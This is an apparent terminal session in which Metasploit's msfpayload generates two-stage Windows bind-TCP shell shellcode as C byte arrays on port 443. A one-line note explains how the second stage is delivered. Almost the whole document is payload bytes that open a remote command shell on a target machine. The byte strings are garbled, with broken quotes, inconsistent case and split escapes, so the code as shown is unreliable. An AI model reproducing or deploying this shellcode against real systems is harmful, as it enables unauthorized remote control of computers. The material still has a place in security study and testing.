root@bt:~# msfpayload windows/shell/bind_tcp lport=443 C/* * windows/shell/bind_tcp-298 bytes (Stage 1) * http://www. metasploit.com * Verbose=false, lport=443, rhost=, exitfunc=process, * initialautorunscript=, AutoRunScript= * * unsign ed char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\ X28\x0f\xb7\x4a\x26\x31\xff "" \x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2 "" \xf0\x52\x57\x8b\ X52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85 "" \xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3 "\ x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d "" \x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\ X75\xe2\x58 "" \x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b "" \x04\x8b\x01\xd0\x89\x44\x24\x24\ X5b\x5b\x61\x59\x5a\x51\xff "" \xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68 "" \x77\x73\x32\x5f\ X54\X68\X4C\X77\X26\X07\XFF\XD5\XB8\X90\X01 "" \x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50 "" \x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x31 "" \xdb\x53\x68\x02\x00\x01\xbb\ X89\xe6\x6a\x10\x56\x57\x68\xc2 "" \xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53 "" \x53\x57\x68\
X74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d "" \x61\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff " "\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58" "\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\
X57\x68\x02\xd9 "" \xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3 "; /* * windows/shell/bind_tcp-240 bytes (stage 2) * http://www.metasploit.com */unsigned char buf[] = "\xfc\xe8\x89\x 00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30 "" \x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff "" \x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2 "" \xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b \x40\x78\x85 "" \xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3 "" \x3c\x49\x8b\x34\x8b\x01\xd6\x31\
xff\x31\xc0\xac\xc1\xcf\x0d ""\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\ x1c\x01\xd3\x8b "" \x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff "" \xe0\x58\x5f\x5a\x8b\x12\xeb\ x86\x5d\x68\x63\x6d\x64\x00\x89 "" \xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44 "" \x24\x3c\x01\
x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56 "" \x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5 " "\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb" "\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\
x3c\x06\x7c\x0a "" \x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5 "; root@bt:~#
Produced two stages of shellcode.
When the first stage of the Shellcode port has a connection request, Metasploit will take the second phase of the shellcode to this connection.